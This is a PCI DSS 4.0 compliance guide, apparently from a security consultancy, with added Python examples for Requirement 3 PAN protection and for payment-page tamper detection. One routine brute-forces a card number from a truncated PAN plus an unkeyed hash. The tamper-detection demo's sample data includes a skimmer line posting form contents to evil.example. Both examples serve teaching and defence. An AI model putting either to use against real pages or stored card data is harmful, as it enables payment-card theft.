The Payment Card Industry Data Security Standard (PCI DSS), developed by the PCI Security Standards Council (PCI SSC), gives organisations worldwide a framework for safeguarding cardholder data. PCI DSS 4.0, released in March 2022, is the most significant revision since v3.0 in 2013: it introduces 64 new requirements and a more flexible, objective-based approach to compliance.
This guide provides a comprehensive overview of PCI DSS 4.0, its key requirements, and how it helps businesses protect payment card information in 2025 and beyond.
What is PCI DSS v4.0 compliance?
PCI DSS v4.0 is the official update to the PCI Data Security Standard, published in March 2022, and v4.0 compliance means meeting its requirements. This version reflects feedback from over 200 organisations and introduces a more adaptable, risk-based approach to securing payment card data.
It emphasises continuous monitoring, proactive risk management, and a customized approach to achieving and maintaining a strong security posture across the entire payment ecosystem.
PCI DSS v3.2.1 to v4.0: What changes were made to the PCI DSS requirements?
Several requirements were updated when PCI DSS version 4.0 was released on March 31, 2022. The transition period for version 3.2.1 ran until March 31, 2024; after that date, version 4.0 became the only active version of the standard.
For PCI DSS version 4.0 assessments, organisations must perform the targeted risk analyses the standard calls for at least once every 12 months. Here is a rundown of the changes in requirements:
Requirement 1 – Install and maintain network security controls
PCI DSS v4.0 updates Requirement 1 of v3.2.1 by broadening the focus from firewalls and routers to network security controls (NSCs) in general.
Key changes in v4.0 include:
- Defining roles and responsibilities for network management components.
- Establishing configuration standards for network security controls and reviewing the NSC rule sets at least once every six months.
- Clarifying security countermeasures between wireless networks and the Cardholder Data Environment (CDE).
- Strengthening controls between trusted and untrusted networks, including restrictions on inbound traffic from untrusted networks.
Requirement 2 – Apply Secure Configurations to All System Components
Here, the title has been revised to focus on secure configuration as a whole, and v4.0 clarifies the guidance that was spread across v3.2.1 requirements 2.1, 2.4 and 2.6, focusing on the following:
- Managing vendor default accounts.
- Ensuring secure configurations beyond vendor default settings.
- Distinguishing primary functions that require different security levels.
- Identifying insecure services, protocols, or daemons.
Requirement 3 – Protect Stored Account Data
The principal requirement title has been updated for account data security, emphasising the importance of protecting sensitive data. The key changes in PCI DSS v4.0 include but are not limited to the following:
- Implementing data retention and disposal policies for sensitive authentication data (SAD) stored before authorisation, and encrypting that SAD.
- Masking the PAN when displayed, so that only personnel with a legitimate business need can see more than the BIN and last four digits.
- Preventing the PAN from being copied or moved during remote access except with explicit authorisation.
- Rendering the PAN unreadable wherever it is stored: hashes must be keyed cryptographic hashes of the entire PAN, and disk-level or partition-level encryption on its own is acceptable only on removable media (on non-removable media it must be combined with another method such as field- or column-level encryption or tokenisation).
- Documenting the cryptographic architecture to ensure the same cryptographic keys are not used in both production and testing environments.
Requirement 4 – Protect Cardholder Data with Strong Cryptography During Transmission Over Open, Public Networks
The requirement title has been revised to highlight strong cryptography and to improve the protection of card data during transmission. A further change (4.1.2) is that roles and responsibilities for performing the activities in Requirement 4 are documented, assigned and understood by the organisation.
Requirement 5 – Protect All Systems and Networks from Malicious Software
It divides the former PCI DSS requirement into three focus areas:
- Keeping the antivirus/malware system up-to-date.
- Performing continuous behavioural analysis, as well as periodic and real-time scans.
- Generating audit logs from the malware solution.
The new PCI DSS version also introduced significant changes to establish roles and responsibilities for malware protection, define the frequency of periodic malware scans in the targeted risk analysis, implement a malware solution for removable media, and introduce measures to detect and protect against phishing attacks.
Requirement 6 – Develop and Maintain Secure Systems and Software
The changes from PCI DSS v3.2.1 to PCI DSS v4.0 for Requirement 6 include but are not limited to:
- Integrating secure software development lifecycle.
- Regular security testing to identify vulnerabilities and missing security controls.
- Security configurations for all system components.
- Prompt patch management and remediation.
- Utilising threat intelligence to enhance security posture.
- Documenting security processes and activities related to system development and maintenance.
Requirement 7 – Restrict Access to System Components and Cardholder Data by Business Need to Know
This PCI DSS requirement includes new roles and responsibilities for access management, clarifications on least privilege principles, removal of some documented procedures, and a definition of the access control model.
Requirement 8 – Identify Users and Authenticate Access to System Components
This requirement uses the terms “authentication factor” and “authentication credentials”, and removes the term “non-consumer users” to clarify that the requirements do not apply to consumer accounts. It also clarifies the authentication process, defines how often MFA factors are evaluated, and limits shared authentication credentials to an exception basis with documented justification.
Also, multi-factor authentication (MFA) is required for all access to the CDE, alongside other measures to restrict access, restrict physical access and protect against password/passphrase misuse.
Requirement 9 – Restrict Physical Access to Cardholder Data
This update clarifies Requirement 9 for sensitive areas of CDE. Key changes include defining the requirements for secure systems’ applicability to the CDE, establishing new roles and responsibilities for v4.0 assessments, and mandating the locking of consoles in sensitive environments when not in use.
Requirement 10 – Log and Monitor All Access to System Components and Cardholder Data
New roles and responsibilities have been introduced and are immediately effective for all v4.0 assessments, and a few redundant requirements have been removed.
Key changes for the PCI DSS compliance include a title revision to highlight audit logs, clarifying that the requirements do not apply to consumer user activity, and replacing “audit trails” with “audit logs” throughout. It also requires critical security controls failure identification and detection, which apply to all entities.
Requirement 11 – Test the Security of Systems and Networks Regularly
The requirement title has been updated, and the key changes in PCI DSS v4.0 include but are not limited to the following:
- Defining roles and responsibilities for the activities in Requirement 11, including wireless access point management, effective immediately for v4.0 assessments.
- Separating internal and external vulnerability scans into distinct requirements, each with clear documentation and retention guidance.
- Requiring multi-tenant service providers to support their customers' external penetration testing; service providers are also expected to monitor their (cloud) environments continuously to identify security risks and vulnerabilities.
Requirement 12 – Support Information Security with Organizational Policies and Programs
The title of this requirement has been updated to highlight organisational policies that support information security. To adopt a focused approach towards assessments, the formal risk assessment has been replaced with targeted risk analyses. A few clarifications on acceptable use policies have been added for end-user technologies. Additionally, an inventory of the cryptographic cipher suites and protocols in use must be documented and reviewed at least annually, and third-party service providers must confirm their PCI DSS scope at least every six months.
How to become PCI 4.0 compliant?
To comply with PCI DSS, businesses must first understand their compliance level. The card brands categorise merchants into four levels based on annual card transaction volume; the commonly used thresholds are:
Level 1: Merchants processing over 6 million transactions per year.
Level 2: Merchants processing between 1 million and 6 million transactions per year.
Level 3: Merchants processing between 20,000 and 1 million e-commerce transactions per year.
Level 4: Merchants processing fewer than 20,000 transactions per year.
Understand compliance level requirements
Level 1: Merchants at Level 1 must undergo an annual on-site assessment by a Qualified Security Assessor (QSA) or, where the card brand permits, a certified Internal Security Assessor (ISA). The assessment validates the scope, reviews documentation and tests whether PCI DSS requirements are met, and results in a Report on Compliance (RoC).
Level 2-4: Merchants at Levels 2 to 4 generally validate with an annual Self-Assessment Questionnaire (SAQ) rather than a RoC, plus quarterly external vulnerability scans by an Approved Scanning Vendor (ASV) where their SAQ type requires them. Exact validation requirements are set by each card brand and the merchant's acquirer; some brands require Level 2 merchants to have their SAQ completed by a QSA or ISA.
Implement PCI requirements
One of the core components of PCI DSS v4.0 compliance is fulfilling the 12 requirements, which include, but are not limited to, implementing a firewall to secure the network hosting the cardholder data environment, establishing robust password policies to prevent unauthorised access, ensuring the encryption of cardholder data both at rest and in transit, and implementing access control measures based on the principle of least privilege.
Also, maintaining logs and monitoring user activity is essential for tracking access and changes. Conducting vulnerability scans and penetration tests helps identify critical vulnerabilities in the overall payment environment, among other important requirements.
Develop and follow plans of action
Develop an action plan to implement and address compliance gaps. Apply required security measures, review them, update processes and policies, and monitor the progress to ensure you meet the PCI DSS requirements.
Regular audits, risk assessments, and VAPT will help identify critical vulnerabilities and document findings for risk remediation based on the internal vulnerability triage process. Our security consultants are adept at supporting such processes, feel free to schedule a free consultation to prepare for your compliance journey.
Complete Self-Assessment questionnaires (SAQ)
As mentioned earlier, level 2-4 merchants or businesses are required to submit a Self-Assessment Questionnaire (SAQ). The SAQ is available on the PCI Security Standards Council (PCI SSC) website and consists of a series of yes-or-no questions. These self-assessment questionnaires evaluate whether the requirements set by the PCI DSS are being met or not. Businesses can complete this self-assessment independently or may choose to file it through a certified Qualified Security Assessor (QSA).
File a Formal Attestation of Compliance (AOC)
Once all security gaps are addressed and controls are implemented, a Level 1 merchant undergoes an assessment by a Qualified Security Assessor (QSA) to complete the Report on Compliance (RoC). Other merchants complete the SAQ and, where required, quarterly external vulnerability scans by a PCI SSC Approved Scanning Vendor (ASV). In both cases the organisation then signs an Attestation of Compliance (AoC) and submits it, together with the RoC or SAQ, to its acquiring bank or the card brands as required; the PCI SSC itself does not receive or approve attestations.
Consequences of PCI DSS non-compliance
PCI DSS is an integral standard for every business that handles credit card transactions or payment processes, and they must comply with it. If a business fails to adhere to it, it can face significant consequences, including financial penalties, reputational damage, and potential business loss. Although PCI fines are not publicly disclosed, merchants could be charged between $5,000 and $100,000 per month until they achieve compliance.
Future-dated requirements of PCI DSS 4.0
These requirements were best practice until March 31, 2025. After that date, organisations must meet them to be PCI DSS compliant – they are now mandatory requirements.
Requirement 3
The future-dated requirements in Requirement 3 of v4.0 include:
- Data retention and disposal policies for SAD stored before authorisation, and encryption of that SAD.
- Masking the PAN when displayed so that only personnel with a business need see more than the BIN and last four digits.
- Preventing the PAN from being copied or moved during remote access.
- Rendering stored PAN unreadable with keyed cryptographic hashes of the entire PAN; disk-level or partition-level encryption on its own is acceptable only on removable media, and on non-removable media must be combined with another mechanism.
- Documenting the cryptographic architecture so the same keys are not used in production and test environments.
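The masking, truncation and keyed-hash controls listed above (and the same Requirement 3 changes described earlier in this guide) in working form. This is an added example written for this guide, not PCI SSC material: it uses the well-known test number 4111 1111 1111 1111 (not a real account), generates a throwaway HMAC key locally (real key management under 3.6 and 3.7 is out of scope here), and assumes a six-digit BIN for masking. The last function shows why 3.5.1.1 insists on a keyed hash: if a truncated PAN (first six and last four, which may be stored) sits beside an unkeyed SHA-256 of the full PAN, the missing middle digits can be brute-forced in well under a second.

```python
"""Requirement 3 controls on a PAN, as added example code (not PCI SSC material):
masking for display, truncation for storage, a keyed hash (HMAC-SHA256) to
render stored PAN unreadable, and a demonstration of why an unkeyed hash is
not enough when truncated PAN is stored alongside it."""
import hashlib
import hmac
import re
import secrets

# Well-known test card number used in payment sandboxes; not a real account.
TEST_PAN = "4111 1111 1111 1111"


def _luhn_contrib(d: int, i_from_right: int) -> int:
    """Contribution of one digit to the Luhn sum (every second digit from the right is doubled)."""
    if i_from_right % 2 == 1:
        d *= 2
        if d > 9:
            d -= 9
    return d


def luhn_valid(pan: str) -> bool:
    n = len(pan)
    return sum(_luhn_contrib(int(c), n - 1 - p) for p, c in enumerate(pan)) % 10 == 0


def normalise_pan(raw: str) -> str:
    """Strip spaces/dashes and reject anything that is not a plausible, Luhn-valid PAN."""
    pan = re.sub(r"[\s-]", "", raw)
    if not pan.isdigit() or not 13 <= len(pan) <= 19 or not luhn_valid(pan):
        raise ValueError("not a valid PAN")
    return pan


def mask_pan(raw: str, full_view: bool = False) -> str:
    """3.4.1: show at most the BIN and last four digits unless the viewer has a
    documented business need (full_view). A six-digit BIN is assumed here."""
    pan = normalise_pan(raw)
    if full_view:
        return pan
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def truncate_pan(raw: str) -> str:
    """Truncation keeps the first six and last four; the middle digits are discarded, not masked."""
    pan = normalise_pan(raw)
    return pan[:6] + pan[-4:]


def hash_pan(raw: str, key: bytes) -> str:
    """3.5.1.1: keyed cryptographic hash of the entire PAN. Key management is out of scope here."""
    return hmac.new(key, normalise_pan(raw).encode(), hashlib.sha256).hexdigest()


def pan_matches(raw: str, key: bytes, stored: str) -> bool:
    """Constant-time comparison of a presented PAN against a stored keyed hash."""
    return hmac.compare_digest(hash_pan(raw, key), stored)


def unkeyed_sha256(raw: str) -> str:
    """The weak practice: a plain SHA-256 of the PAN with no key."""
    return hashlib.sha256(normalise_pan(raw).encode()).hexdigest()


def complete_luhn(digits: list, pos: int) -> int:
    """Return the digit at index pos that makes the whole number Luhn-valid."""
    n = len(digits)
    partial = sum(_luhn_contrib(d, n - 1 - p) for p, d in enumerate(digits) if p != pos)
    for cand in range(10):
        if (partial + _luhn_contrib(cand, n - 1 - pos)) % 10 == 0:
            return cand
    raise AssertionError("unreachable: doubling is a bijection mod 10")


def recover_pan_from_unkeyed_hash(first6: str, last4: str, digest: str, length: int = 16):
    """Given a truncated PAN (which PCI DSS allows to be stored) and an unkeyed hash
    of the same PAN, brute-force the missing middle digits. The Luhn check fixes
    one of them, so a 16-digit PAN leaves only 10**5 candidates."""
    free = length - 10 - 1          # middle digits minus the Luhn-determined one
    fixed_pos = 6 + free            # index of the digit we derive from Luhn
    head = [int(c) for c in first6]
    tail = [int(c) for c in last4]
    for n in range(10 ** free):
        mid = [int(c) for c in str(n).zfill(free)]
        digits = head + mid + [0] + tail
        digits[fixed_pos] = complete_luhn(digits, fixed_pos)
        cand = "".join(map(str, digits))
        if hashlib.sha256(cand.encode()).hexdigest() == digest:
            return cand
    return None


if __name__ == "__main__":
    key = secrets.token_bytes(32)   # in production this comes from an HSM/KMS
    print("display:", mask_pan(TEST_PAN))
    print("stored :", truncate_pan(TEST_PAN), hash_pan(TEST_PAN, key)[:16] + "...")
    weak = unkeyed_sha256(TEST_PAN)
    print("recovered from unkeyed hash:", recover_pan_from_unkeyed_hash("411111", "1111", weak))
```

Run it directly to see the masked and truncated forms and the recovered PAN. The recovery routine goes slightly beyond the bullets above: it works for any PAN length by deriving one middle digit from the Luhn check, which is also why Requirement 3.5.1 says that hashed and truncated versions of the same PAN must not be correlatable to reconstruct the original.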
Requirement 4
Two new requirements in this area:
- Certificates used to safeguard the PAN during transmission over open, public networks must be confirmed valid and not expired or revoked.
- An inventory of the organisation's trusted keys and certificates must be maintained.
Requirement 5
The following actions are essential in the future for requirement 5 to maintain a secure environment:
- Perform a targeted risk analysis to determine how often system components identified as not at risk for malware are re-evaluated.
- Perform a targeted risk analysis to determine the frequency of periodic malware scans.
- Conduct anti-malware scans when using removable electronic media.
- Implement mechanisms to detect and protect personnel against phishing attacks.
Requirement 6
This is about software management for security. You need to do the following to be PCI DSS compliant:
- Keep an inventory of custom and bespoke software to enable vulnerability and patch management.
- Deploy an automated technical solution for public-facing web applications to detect and prevent web attacks in real-time.
- Manage all payment page scripts loaded and executed in the customer’s browser for security and compliance.
Requirement 7
This is about regular reviews of user accounts and access privileges. You need to do the following:
- Review all user accounts and their associated access privileges at least once every six months, and remove or adjust any that are no longer needed.
- Assign and manage application and system accounts correctly, and periodically review their access privileges so they remain the minimum required.
Requirement 8
The future-dated parts of Requirement 8 are about strong authentication for access to system components and cardholder data. You need to do the following:
- Enforce a minimum password/passphrase length of 12 characters (or 8 where the system cannot support 12), containing both numeric and alphabetic characters. Where passwords or passphrases are the only authentication factor for user access, they must be changed at least every 90 days, or the account's security posture must be analysed dynamically to determine real-time access.
- Implement multi-factor authentication for all access into the CDE, with MFA systems configured so that they cannot be bypassed and are resistant to replay attacks.
- Protect the passwords and passphrases of application and system accounts from misuse, and prevent interactive login with those accounts except where needed and managed on an exception basis.
Requirement 9
This PCI DSS requirement is about regular inspections and targeted risk analysis for Point of Interaction (POI) devices.
Requirement 10
This Requirement 10 focuses on audit log management for the integrity and security of systems. You need to implement these measures:
- Automate audit log reviews to enhance efficiency and accuracy.
- Conduct a targeted risk analysis to determine the frequency of log reviews for all other system components.
- Promptly detect and alert on failures of critical security control systems, and respond to those failures without delay.
Requirement 11
Requirement 11 requires organisations to demonstrate comprehensive security measures to manage vulnerabilities across their hardware and software assets, including those not rated critical or high risk. The items are:
- Manage all applicable vulnerabilities that are not ranked as high-risk or critical, on a schedule set by targeted risk analysis.
- Perform internal vulnerability scans using authenticated scanning.
- Multi-tenant service providers must support their customers' external penetration testing.
- Service providers must implement detection, alerting, prevention and remediation for covert malware communication channels via intrusion detection and prevention techniques.
- Deploy a change-and-tamper detection mechanism specifically for payment pages.
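The script inventory under Requirement 6 (6.4.3) and the change-and-tamper detection for payment pages listed here (11.6.1) can be implemented together: record an integrity value and a business justification for every authorised script, then repeatedly compare what the page actually loads against that baseline. The code below is an added example written for this guide, not PCI SSC or vendor code; the URLs, script bodies, skimmer payload and inventory are constructed, and the fetch callback stands in for however the real check retrieves what the browser receives (a headless browser or a proxy in front of the CDN).

```python
"""Payment page script inventory (6.4.3) and change-and-tamper detection (11.6.1),
as added example code not from the PCI SSC. URLs, script bodies and the
inventory below are constructed for the demonstration."""
import base64
import hashlib
from dataclasses import dataclass
from html.parser import HTMLParser


def sri_hash(content: bytes) -> str:
    """Subresource Integrity value (sha384-<base64>) that can also go into
    the <script integrity="..."> attribute so the browser enforces it."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode()


@dataclass
class Finding:
    src: str
    status: str          # "ok" | "unauthorised" | "modified"
    detail: str = ""


class _ScriptCollector(HTMLParser):
    """Collects (src, inline_body) for every <script> on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def audit_payment_page(html: str, inventory: dict, fetch) -> list:
    """Compare the scripts a page actually loads against the authorised inventory.
    inventory maps a script URL (or 'inline:<sri>' for inline scripts) to a record
    with the approved integrity value and its written business justification;
    fetch(url) returns the bytes the browser would receive."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if src is None:
            key = "inline:" + sri_hash(body.encode())
            status = "ok" if key in inventory else "unauthorised"
            findings.append(Finding(key, status, "inline script"))
            continue
        record = inventory.get(src)
        if record is None:
            findings.append(Finding(src, "unauthorised", "not in the 6.4.3 inventory"))
            continue
        actual = sri_hash(fetch(src))
        if actual != record["integrity"]:
            findings.append(Finding(src, "modified", f"expected {record['integrity']}, got {actual}"))
        else:
            findings.append(Finding(src, "ok", record["justification"]))
    return findings


# --- constructed sample data (not real merchant assets) ----------------------
APPROVED_CHECKOUT = b"document.querySelector('#pay').addEventListener('submit', submitPayment);"
APPROVED_ANALYTICS = b"track('pageview');"
APPROVED_INLINE = b"window.__ENV='prod';"

# What the CDN currently serves: analytics.js has grown a skimmer payload.
SERVED = {
    "https://shop.example/js/checkout.js": APPROVED_CHECKOUT,
    "https://cdn.example/analytics.js": APPROVED_ANALYTICS
    + b"\nfetch('https://evil.example/c',{method:'POST',body:document.forms[0].innerText});",
}

# Baseline recorded when each script was authorised (6.4.3).
INVENTORY = {
    "https://shop.example/js/checkout.js": {"integrity": sri_hash(APPROVED_CHECKOUT), "justification": "payment form submission"},
    "https://cdn.example/analytics.js": {"integrity": sri_hash(APPROVED_ANALYTICS), "justification": "page analytics"},
    "inline:" + sri_hash(APPROVED_INLINE): {"integrity": sri_hash(APPROVED_INLINE), "justification": "environment flag"},
}

# The page as received by the consumer browser; widget.js was never authorised.
PAYMENT_PAGE = """<html><body>
<form id="pay"></form>
<script src="https://shop.example/js/checkout.js"></script>
<script src="https://cdn.example/analytics.js"></script>
<script src="https://static.example/widget.js"></script>
<script>window.__ENV='prod';</script>
</body></html>"""


def demo_findings() -> list:
    return audit_payment_page(PAYMENT_PAGE, INVENTORY, lambda url: SERVED[url])


if __name__ == "__main__":
    for f in demo_findings():
        print(f"{f.status:12} {f.src}  {f.detail}")
```

The same sha384 value can be placed in each script tag's integrity attribute so the browser itself refuses a modified file, and a Content-Security-Policy can block scripts outside the inventory; the out-of-band check above still matters because 11.6.1 asks you to detect and alert on unauthorised changes to payment page content and HTTP headers as received by the browser, not only to block them.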
Requirement 12
The last requirement in PCI DSS 4.0 emphasises a proactive approach to risk management and personnel training, ensuring robust protection of cardholder data through the following measures:
- Using a targeted risk analysis to define how often incident response personnel are trained, and initiating incident response procedures as soon as stored PAN is detected anywhere it is not expected.
- Incorporating alerts from the change- and tamper-detection mechanisms for payment pages into incident response procedures.
- For service providers, confirming PCI DSS scope at least once every six months and, where segmentation is used to isolate the CDE, verifying the segmentation controls with penetration testing at least every six months.
- Documenting and reviewing the impact of organisational changes on PCI DSS scope, with findings communicated promptly to management.
- Reviewing and updating the security awareness programme at least annually, covering relevant threats to the CDE (including phishing and social engineering) and guidelines for acceptable use of end-user technologies.
- Assessing hardware and software technologies regularly while documenting targeted risk analyses to support compliance with PCI DSS requirements.
Timeline for PCI DSS 4.0 adoption and enforcement deadlines
Release of PCI DSS 4.0
The PCI DSS v4.0 was released in March 2022 and introduced updated requirements and guidance for securing payment account data and environments.
Organisations using the customised approach must work closely with a Qualified Security Assessor (QSA) to document the chosen controls and how they meet each requirement's stated objective; it cannot be used with an SAQ and suits organisations with mature security programmes. Customised validation is distinct from compensating controls, which require documented justification when an organisation cannot meet a specific requirement because of a legitimate technical or business constraint. The PCI SSC emphasises that the customised approach is not a way to reduce assessment rigour: each customised control is still tested by the assessor against the requirement's objective.
End of support for PCI DSS v3.2.1
PCI DSS v3.2.1 was retired on March 31, 2024, after which it became mandatory for businesses to validate compliance against the PCI DSS 4.0 requirements.
Transition period
Organisations are encouraged to familiarise themselves with the new requirements and implement appropriate modifications to their security protocols and controls concerning version 4.0 during the specified timeframe, specifically from March 2022 to March 2024. During this transitional period, organisations may adhere to either the PCI version 3.2.1 or the PCI version 4.0 standards.
Requirements deadline by PCI Security Standards Council
The future-dated requirements in v4.0 became mandatory on March 31, 2025. Separately, v4.0 itself was retired on December 31, 2024 in favour of v4.0.1, which corrects and clarifies the text without changing the requirements.
What are the PCI DSS 4.0 requirements?
PCI DSS 4.0 consists of 12 requirements applicable to all businesses that store, process or transmit cardholder data (CHD) or sensitive authentication data (SAD), or whose systems can affect the security of the CDE. The new requirements add security controls to protect payment card data and help merchants, banks and financial institutions stay compliant. Some were effective immediately for v4.0 assessments; the future-dated ones became mandatory on March 31, 2025.
1. Build and maintain a secure network and systems
Requirement 1: Install and maintain network security controls.
Network security controls such as firewalls are the first line of defence between internal and external networks. PCI DSS 4.0 requires organisations to install and configure them to block unauthorised traffic into the cardholder data environment, to document the rules, and to review them regularly.
Requirement 2: Apply secure configurations to all system components.
Default passwords and settings are behind many data breaches, as they are easy to guess and publicly documented. Organisations must change vendor defaults and harden system configurations before components are used in their PCI environment.
2. Protect account data
Requirement 3: Protect stored account data.
To prevent exposure of sensitive information, stored account data must be kept to a minimum and protected with strong encryption, keyed hashing, truncation, tokenisation or another method appropriate to the circumstances.
Requirement 4: Protect cardholder data with strong cryptography during transmission over open, public networks.
Open, public networks pose a high risk when transmitting sensitive information such as cardholder data. To meet this requirement, transmissions must use strong cryptography, for example HTTPS with a current TLS configuration (TLS 1.2 or later, with valid, unexpired certificates).
3. Maintain a vulnerability management program
Requirement 5: Protect all systems and networks from malicious software.
Anti-malware software helps detect and prevent malware infection and delivery. It gives the PCI environment controls to identify, detect and block potential threats, and v4.0 extends this to phishing protection and scanning of removable media.
Requirement 6: Develop and maintain secure systems and software.
When you build security into the foundation, you significantly reduce the attack surface, and this PCI DSS requirement addresses exactly that. Regular software updates, patches, vulnerability assessments and secure coding practices keep your applications and systems secure throughout their lifecycle.
4. Implement strong access control measures
Requirement 7: Restrict access to system components and cardholder data by business need to know.
Granting access on a need-to-know basis minimises the risk of unauthorised access. The requirement mandates an access control model (typically role-based) that grants the least privileges necessary to protect the cardholder data environment (CDE).
Requirement 8: Identify users and authenticate access to system components.
Unique identifiers for every user add accountability and make audit trails meaningful. In the long run, this is a powerful security control that helps track activity and identify the source of a breach.
Requirement 9: Restrict physical access to cardholder data.
Appropriate physical security controls are needed to protect cardholder data processing or storage environments. These include surveillance systems, visitor management processes, etc.
5. Regularly monitor and test networks
Requirement 10: Log and monitor all access to system components and cardholder data.
Effective monitoring that identifies security events for analysis is key to having the right alerts in place when something goes wrong. It helps detect and respond to security incidents and strengthens the logging and monitoring controls that underpin your security strategy.
Requirement 11: Test security of systems and networks regularly.
As new zero-days are exploited regularly, ongoing testing is important to confirm that your systems are free of known weaknesses and that relevant controls, such as vulnerability management, intrusion detection and incident response procedures, are in place to address issues promptly.
6. Maintain an information security policy
Requirement 12: Support information security with organisational policies and programs.
An information security policy sets out how security practices are implemented across people, processes and technology. The business must maintain a policy that addresses topics such as data protection, acceptable use, incident response procedures, vulnerability management and security awareness training.
Achieving and Maintaining PCI DSS 4.0 Compliance
Organisations can comply with PCI DSS 4.0 by first assessing their current data security posture and then implementing the PCI-defined controls, organised under the six PCI DSS goals. The 12 requirements break down into actionable steps, such as deploying technical controls, completing a Self-Assessment Questionnaire (SAQ), conducting risk and vulnerability assessments, and implementing other security measures.
Once implemented, security monitoring systems, testing procedures, and documentation are required to maintain compliance and remediate issues as they arise.
Journey to PCI DSS 4.0 Compliance: Prioritised approach
The Prioritised Approach organises the PCI DSS requirements into six risk-based security milestones to help organisations protect account data against evolving risks and threats while working towards PCI DSS compliance. Developed from breach data and feedback from Qualified Security Assessors, forensic investigators and the PCI Security Standards Council Board of Advisors, it focuses on securely storing, processing and transmitting payment account data.
1. Eliminate sensitive data storage
The first milestone addresses the risk factor most often seen in compromised entities. It emphasises not storing sensitive authentication data or other account data when there is no need for it.
2. Protect systems and networks
This milestone focuses on implementing controls at key access points to prevent compromises and establish effective incident response procedures.
3. Secure payment applications
The application and server vulnerabilities can help threat actors compromise systems and retrieve cardholder data. Therefore, it is crucial to maintain secure systems, applications and servers with appropriate security controls.
4. Monitor and manage access to your systems
This milestone focuses on implementing controls to track the activity performed in the CDE, such as who accessed your network, what actions were taken, when, and how.
5. Safeguard stored cardholder data
This one is particularly directed toward organisations that must store Primary Account Numbers (PANs). It is all about implementing robust protections to secure the PANs’ data.
6. Finalise compliance efforts
This milestone ensures that all remaining PCI DSS requirements are fulfilled and that the necessary policies, procedures, and processes are completed to fully protect the CDE.
💡This article is intended for PCI DSS v4.0 read only. For updates and clarifications introduced in PCI DSS v4.0.1, refer to our dedicated guide on PCI DSS v4.0.1.
Summary of PCI Compliance v4.0
PCI DSS 4.0 significantly evolves payment card data security, emphasizing a more flexible, risk-based approach. Key updates include enhanced requirements for network security, strong cryptography, physical access control, vulnerability management, and security awareness training. Understanding these requirements and implementing the necessary controls is crucial for maintaining compliance and safeguarding your business.
Annual PCI DSS Testing with Cyphere
Regular security assessments, including penetration testing and vulnerability scanning, are vital for maintaining PCI DSS compliance and identifying potential weaknesses in your security posture. Cyphere can help you navigate the complexities of PCI DSS 4.0 and ensure your systems are secure.
Contact us or book a call for a PCI DSS compliance consultation. It’s a great opportunity to discuss your concerns and collaborate on an action plan for PCI DSS.
FAQs PCI DSS v4.0
What are the changes for PCI compliance in 2024?
In 2024, PCI compliance saw the end of the transition period from v3.2.1 to v4.0, which concluded in March 2024.
Do we need to implement PCI DSS 4.0 now?
Yes. PCI DSS v3.2.1 was retired on March 31, 2024, and v4.0 itself was retired on December 31, 2024 in favour of v4.0.1, which corrects and clarifies v4.0 without adding or removing requirements. Businesses must therefore implement v4.0/v4.0.1 to maintain PCI DSS compliance.
When did PCI 4.0 come out?
The Payment Card Industry Security Standards Council (PCI SSC) officially published PCI DSS 4.0 in March 2022.
What is the difference between PCI 4.0 and 3.2.1?
Introduced in 2018, the PCI DSS v3.2.1 version was rigid and unable to address the evolving threat landscape of modern IT, such as cloud and serverless environments. In contrast, v4.0 offers a more customised and flexible approach to risk management through continuous monitoring, defined roles and responsibilities, strong encryption standards, and other customised security controls. It also emphasises security awareness training.
Is PCI DSS 4.0 mandatory?
Yes. Organisations handling payment card data have had to assess against v4.0 (now v4.0.1) since v3.2.1 was retired on March 31, 2024, and the future-dated requirements became mandatory on March 31, 2025.
Should you focus on PCI 4.0 or 4.0.1 now?
If you’re starting your PCI DSS compliance journey, focus on PCI DSS v4.0 to understand its foundational principles, as v4.0.1 is a limited version with no additional or deleted PCI DSS requirements.
If you are familiar with v4.0, prioritise v4.0.1 for its updates and clarifications regarding PCI DSS scope. Keep in mind that version 4.0 was retired on December 31, 2024. Therefore, organisations getting ready for audits must comply with the latest version (v4.0.1).